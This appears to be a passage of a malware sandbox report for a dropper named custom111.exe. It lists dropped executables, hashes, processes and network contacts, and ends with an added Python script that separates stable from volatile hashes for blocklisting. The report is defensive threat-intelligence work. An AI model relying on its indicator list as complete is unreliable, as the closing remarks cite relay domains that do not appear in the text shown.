| SHA256 | c7fa50bcfbec3474718592017a9b5b1d1085a3cba2d5e386f5019cfcd319d5ae |
| SHA512 | f0e582a5f7b230d238923834b72c83ac9310f3788db1e52ea3f00b94396332dbd5f7e84158a3d96f3657a1c081b6c48347e795067425b2f280a3db111d5b0fe2 |
memory/3068-101-0x0000000074840000-0x0000000074F2E000-memory.dmp
memory/3068-102-0x00000000011F0000-0x0000000001830000-memory.dmp
memory/3068-103-0x00000000004C0000-0x0000000000500000-memory.dmp
C:\Windows\System32\CatRoot\$SXR\Read.txt
| MD5 | 79668a6729f0f219835c62c9e43b7927 |
| SHA1 | 0cbbc7cc8dbd27923b18285960640f3dad96d146 |
| SHA256 | 6f5747973e572dc3ec0ae4fd9eaf57263abb01c36b35fcddf96e89208b16496e |
| SHA512 | bc3895b46db46617315ffaa2ec5e2b44b06e1d4921834be25e1b60b12f2fba900f0f496070eb9f362952abcfa0b3b359bf1ced7da5ec0db63541e0977e6ea4e3 |
C:\Users\Admin\AppData\Roaming\temp0923
| MD5 | f54e0ad084d6b44f4a7ff94514ba0fb8 |
| SHA1 | 3e168eb2b1b20a00c079ce59941e4235a5129534 |
| SHA256 | f70ff68f63bdbc74f20647d2f96c1c9e4c1b783f059f901a6c2d09b1741fba1a |
| SHA512 | 404f73505792ffb73a82a004afa9f4e7423cacae6dc945532d1434970fc9e4836da9497734ab9e9a41f5b1b2c07ff6a78036d328b332ba78204eede011117a28 |
C:\Users\Admin\AppData\Local\Temp\CabF588.tmp
| MD5 | 753df6889fd7410a2e9fe333da83a429 |
| SHA1 | 3c425f16e8267186061dd48ac1c77c122962456e |
| SHA256 | b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78 |
| SHA512 | 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444 |
memory/1784-125-0x0000000003FE0000-0x0000000003FE1000-memory.dmp
memory/3068-127-0x0000000074840000-0x0000000074F2E000-memory.dmp
memory/1784-145-0x0000000002B20000-0x0000000002B30000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-09 23:11
Reported
2024-03-09 23:15
Platform
win10v2004-20240226-en
Max time kernel
173s
Max time network
184s
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\custom111.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\switched.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\switched.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\custom111.exe
"C:\Users\Admin\AppData\Local\Temp\custom111.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3952 --field-trial-handle=2656,i,16940681401824032220,151921362336696246,262144 --variations-seed-version /prefetch:8
C:\Users\Admin\AppData\Local\Temp\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Client.exe"
C:\Users\Admin\AppData\Local\Temp\switched.exe
"C:\Users\Admin\AppData\Local\Temp\switched.exe"
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cww0hbcg\cww0hbcg.cmdline"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 142.250.179.234:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | keyauth.win | udp |
| US | 104.26.1.5:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | 5.1.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| GB | 173.222.13.40:80 | x2.c.lencr.org | tcp |
| US | 104.26.1.5:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | 40.13.222.173.in-addr.arpa | udp |
| N/A | 127.0.0.1:49884 | N/A | tcp |
| N/A | 127.0.0.1:49886 | N/A | tcp |
| N/A | 127.0.0.1:49891 | N/A | tcp |
| N/A | 127.0.0.1:49893 | N/A | tcp |
| US | 8.8.8.8:53 | 175.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.72.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\Client.exe
| MD5 | 3ca169e7dd598b61e50b2596c8fef2b1 |
| SHA1 | 81c3483719d5a4476cec71c827c0ec4feb085f34 |
| SHA256 | 95257639438064d9256ffeeef2b6498a488c2f183472c79d8b3e15a7ded4fe83 |
| SHA512 | 2bb8f5dc48e16d887916dbce1d2871b9640a60c5237aa0ea5d68016d4cef6315e4a3462e3cbae30ec3bca20c33dd2472b301bc7cf9fd0ab69b7871ebfb13afd8 |
C:\Users\Admin\AppData\Local\Temp\Client.exe
| MD5 | 52d1ed39a91e338853e5e569a20cc51f |
| SHA1 | dd97d913951a496b636b2a0ec31a37cf1eba89fa |
| SHA256 | 4edc517c79a7e2612180b2b428d7f4000ba7f77fa4cf8f12551a6fac82fddbc7 |
| SHA512 | 65de442cc576598e8d62dcb476e3cbee01a5d0bdb0e3a2e1769bfae622586d6986b115b69f6d4c1e2e6eab2b9c5d3847d404a504e7db0c610b2806a24202c678 |
C:\Users\Admin\AppData\Local\Temp\switched.exe
| MD5 | 1a585b268ae3dfc74601794a69b27b3d |
| SHA1 | fb9156c02f684b8ef052e5a3ef29769a337377de |
| SHA256 | 107c642f5a6301a00d8de2684a1cee41faef8f12f9325888ff0a9400f895fd03 |
| SHA512 | 2b4f10eabc9dbef226cc5f962bb301e5745b3a632be9171f5f0ea665f4d0824a499abcf6be01171352fc2423172fd37eae0f30870680e649eb037d8b64408dc6 |
C:\Users\Admin\AppData\Local\Temp\switched.exe
| MD5 | 9d70b31636f98dd714093f0370028fec |
| SHA1 | aa9754cb8aaff2480635475e3e0580a91ebd2e39 |
| SHA256 | 9395fb97b98370192b7a9703dc6692b990c82edb016c771b38070a74fb6132ea |
| SHA512 | 217b8d873219eeade58baa0e64ba3f487c38ee064c4e605d89f2b85322641e3ed3595d96e41eb0b4f31c8327053c95df418c6fcdb3190fcb8701fd68fe760888 |
C:\Users\Admin\AppData\Local\Temp\switched.exe
| MD5 | 8acd36edfeff37e0994c1987cf94a714 |
| SHA1 | ecaf0cc174c3539feb90d79a9a3c22d16e5c54f7 |
| SHA256 | 7b771c4bda57f4d118f7b208d8c4f0af9225dffa36d41ca152f4466a27303df6 |
| SHA512 | f8b45d5ac9fb7ad122ac1c6d2b18f8cbefb11138ba772de310093ed33c121257ebb727b48275cc02140ae1a3d3bd4d28ca126c89e5acabdb04d1f6cbf09b2f05 |
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
| MD5 | 49ff0d28046935ef1a54a71b8c4c49af |
| SHA1 | 64b89355e3c097eb90e789cd7e0605665879508e |
| SHA256 | 2ae5003110440596247b9a3a992af5e0b97da6591abec0d0b72ac91c265ffe65 |
| SHA512 | 6e276f5d58de26fcbe5be9661ea268a4749d7833405480cc530a67093b10c2ba6dfabf2ae61c5e48a06372f6431196c1f6fef9e2955019bf1b012c9b38c931e1 |
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
| MD5 | ba12cb4a3ac2edad168c4a560aa267b4 |
| SHA1 | 29aaf147a426164ecca7a2d285a44c3a3c0008c1 |
| SHA256 | 30a3041e4ae5f1afcaea92d31279f326715ef8c32f9466c74975bc4d3db9e482 |
| SHA512 | 44413dd70987672a9cb127c7ac52636568fe004fca2d1128b32863a3ac28d8a8c6a393d30757df25698b3fe7252ca2ddbbb5db2ca78db76d10d97f82046eabff |
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
| MD5 | 332a5c22c058b271f27ac3d7c0cd82f0 |
| SHA1 | 3fcf1b35a61cfecdc153bc3c3f66f25dee5d07f0 |
| SHA256 | a549601f701734185b84b2157ce62a144a20b2d7587b127c6d218e8765e14c2a |
| SHA512 | f37cd81fc02b6112989b8c69087f5fff26de0175647594794356e1b664875b7ca2baa39ed8fe877d9a86aa7429a235e21b4a8e49bc6fcae0364797329aeae1ec |
memory/4356-36-0x00007FF619650000-0x00007FF619A8C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
| MD5 | 0f0838bc6642dd6bc603368e50b4aba3 |
| SHA1 | 932bd4d1c11996bf8ac3ac74a94b266e96d44c36 |
| SHA256 | 4acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9 |
| SHA512 | a39605eaa160d4f918393c600d42873f2e6bfb54506edfbe590aac0f75d12b4aa66ff91192c0522c235695a9c6b95cd2dbe308b548b5f121ca6b6b7696029860 |
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
| MD5 | 42fd033140c0e5ce96c34756615d095a |
| SHA1 | 6b9c25b23cfa2a398a4ea67021c43b6030eac5dd |
| SHA256 | ef397a59c2c231186b6171c8524f187ee92bcf42b8670fca1e05d0c3a356fc4b |
| SHA512 | d32cd706d0c2f51f2c114b8f5aad298890af94d3736285b987761a2da3028265d2d142f4b40c9f0d2f8c9a68da1419c28527abc3568354d17e5ba6aef0dd5001 |
C:\Users\Admin\AppData\Local\Temp\Client.exe
| MD5 | 339fa0249a4df86a6f48b8ca5eb71c50 |
| SHA1 | 893e508cf08829af4b0933426ad25597a6dcf893 |
| SHA256 | dc0a80c2d0cd372c11749f3b48c6c7d06049ff42b87e47a34ee4b227cc0fad88 |
| SHA512 | 1ecc89cf4b7066fd7e31edcd60249a240e290666a14e3adaf5df25ff73a4306af6985d2e6e6d683d8c988e7dc17c092f8466fc712310b3db60d2f8667faf8adf |
memory/2784-39-0x0000000074E80000-0x0000000075630000-memory.dmp
memory/4768-40-0x0000000074E80000-0x0000000075630000-memory.dmp
memory/4768-41-0x0000000000950000-0x00000000009D2000-memory.dmp
memory/2784-42-0x0000000000590000-0x0000000000BD0000-memory.dmp
memory/4356-43-0x00007FF619650000-0x00007FF619A8C000-memory.dmp
memory/2784-44-0x0000000074E80000-0x0000000075630000-memory.dmp
memory/4768-45-0x0000000074E80000-0x0000000075630000-memory.dmp
memory/4768-46-0x0000000005730000-0x00000000057CC000-memory.dmp
memory/4768-47-0x00000000057D0000-0x0000000005862000-memory.dmp
memory/4768-48-0x0000000005990000-0x00000000059A0000-memory.dmp
memory/2784-49-0x00000000057A0000-0x00000000057B0000-memory.dmp
memory/4768-50-0x0000000007360000-0x0000000007904000-memory.dmp
memory/4768-51-0x0000000005990000-0x00000000059A0000-memory.dmp
memory/2784-52-0x00000000057A0000-0x00000000057B0000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\cww0hbcg\cww0hbcg.cmdline
| MD5 | eab87d0fb9657854c23af86ad9eb9310 |
| SHA1 | 041c96e0e1fe47acdbcf546f8f4ef0ae9e29d0d4 |
| SHA256 | f125e4128785432ee40c8fff5281d38bf021189b35236a6f89e8931e0cac31ab |
| SHA512 | 7166dfcee42c5269ab89514db9e71050296e5895e94757b0f022916ccd4bbcd40ad8a32ea65729f3661aa6298079803201313a033b9bfdc15f8e024040446aaa |
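Both runs drop the same file names, but only some of the hashes repeat: tesetey.exe has the same SHA256 (4acfa7fc…) in behavioral1 and behavioral2, while Client.exe, switched.exe and pulse x loader.exe are listed several times per run with different hashes, the compiler temp files sit under randomly named directories (5n0bdwnb, cww0hbcg), and $SXR.exe and Read.txt appear only in the Windows 7 run. The script below is an added example, not part of the report: it parses file blocks in the layout used above, folds the path spellings the page uses (\Users\…, C:\Users\…, \??\c:\…, catroot/CatRoot) into one key, and separates hashes seen in every run from those that are not, which is what decides whether a hash or a path, task name or relay domain goes into a blocklist. The sample is a trimmed copy of the two Files sections.

```python
"""Hash stability across the two detonations.

Added example, not part of the report: parses the Files sections in the
layout used on the page and tells hashes seen in every run apart from hashes
that occur in only one, the difference between an indicator worth blocking
and sandbox noise. The sample is a trimmed copy of behavioral1 and behavioral2.
"""
import re
from collections import defaultdict

# Constructed sample: trimmed copies of the two Files sections above.
SAMPLE_FILES = {
    "behavioral1": r"""
\Users\Admin\AppData\Local\Temp\Client.exe
| MD5 | 35aacbff43ce73ac748965648fb212e7 |
| SHA256 | be456f95a11dcaac58af77ed485750cdddcf441316bb9115ed3d5a907d74b428 |
C:\Users\Admin\AppData\Local\Temp\Client.exe
| MD5 | 3fd4631f10c52fbf309d12f81fc774cd |
| SHA256 | fa200ad81e353e08cde26160a4274ba6155f6a1099e3d067e017e6d33c97690d |
\Users\Admin\AppData\Local\Temp\tesetey.exe
| MD5 | 0f0838bc6642dd6bc603368e50b4aba3 |
| SHA256 | 4acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9 |
memory/2496-20-0x0000000002AF0000-0x0000000002F2C000-memory.dmp
C:\Windows\System32\catroot\$SXR\$SXR.exe
| MD5 | e83215165939567f1ee561e8e54790c7 |
| SHA256 | ce5d4d869c07e41ee190d929d144625b1bac3b080271d9ed91177a9c8949446f |
\??\c:\Users\Admin\AppData\Local\Temp\5n0bdwnb\5n0bdwnb.cmdline
| SHA256 | e2e3fc8cbca3830077ea8990351d69e412398c053aea2948f4ccba288268ef8f |
""",
    "behavioral2": r"""
C:\Users\Admin\AppData\Local\Temp\Client.exe
| MD5 | 3ca169e7dd598b61e50b2596c8fef2b1 |
| SHA256 | 95257639438064d9256ffeeef2b6498a488c2f183472c79d8b3e15a7ded4fe83 |
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
| MD5 | 0f0838bc6642dd6bc603368e50b4aba3 |
| SHA256 | 4acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9 |
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
| MD5 | 42fd033140c0e5ce96c34756615d095a |
| SHA256 | ef397a59c2c231186b6171c8524f187ee92bcf42b8670fca1e05d0c3a356fc4b |
\??\c:\Users\Admin\AppData\Local\Temp\cww0hbcg\cww0hbcg.cmdline
| SHA256 | f125e4128785432ee40c8fff5281d38bf021189b35236a6f89e8931e0cac31ab |
""",
}

HASH_ROW = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-fA-F]+)\s*\|$")


def normalize(path):
    """Canonical key for one dropped file: case-folded, NT '\\??\\' prefix and
    drive letter removed, so '\\??\\c:\\x', 'C:\\x' and '\\x' all become '\\x'."""
    p = path.strip().lower()
    if p.startswith("\\??\\"):
        p = p[4:]
    if re.match(r"^[a-z]:", p):
        p = p[2:]
    return p


def parse_files(text):
    """Yield (normalized path, sha256) for every file block. A path line
    starts a block; memory/... dump lines carry no hashes and end one."""
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HASH_ROW.match(line)
        if m:
            if m.group(1) == "SHA256" and current:
                yield current, m.group(2).lower()
        elif line.startswith("memory/"):
            current = None
        else:
            current = normalize(line)


def hashes_by_run(runs):
    """{path: {run name: set of sha256}} across all runs."""
    out = defaultdict(lambda: defaultdict(set))
    for run, text in runs.items():
        for path, sha in parse_files(text):
            out[path][run].add(sha)
    return out


def stable_indicators(runs):
    """Split paths into those with a SHA256 present in every run (hash worth
    blocking on) and those without (match on path or behaviour instead)."""
    stable, volatile = {}, {}
    for path, per_run in hashes_by_run(runs).items():
        if len(per_run) < len(runs):
            volatile[path] = "only dropped in " + ", ".join(sorted(per_run))
            continue
        common = set.intersection(*per_run.values())
        if common:
            stable[path] = common
        else:
            distinct = set.union(*per_run.values())
            volatile[path] = f"no SHA256 shared between runs ({len(distinct)} distinct)"
    return stable, volatile


if __name__ == "__main__":
    stable, volatile = stable_indicators(SAMPLE_FILES)
    for path, shas in stable.items():
        print("STABLE  ", path, sorted(shas))
    for path, why in volatile.items():
        print("VOLATILE", path, why)
```

Run over the full Files sections the same split holds: tesetey.exe is the one dropped component whose hash survives a second detonation, so its SHA256 and the submitted custom111.exe hash are the file indicators to keep, while the $SXR task name, the CatRoot path and the ply.gg relay names cover the rest.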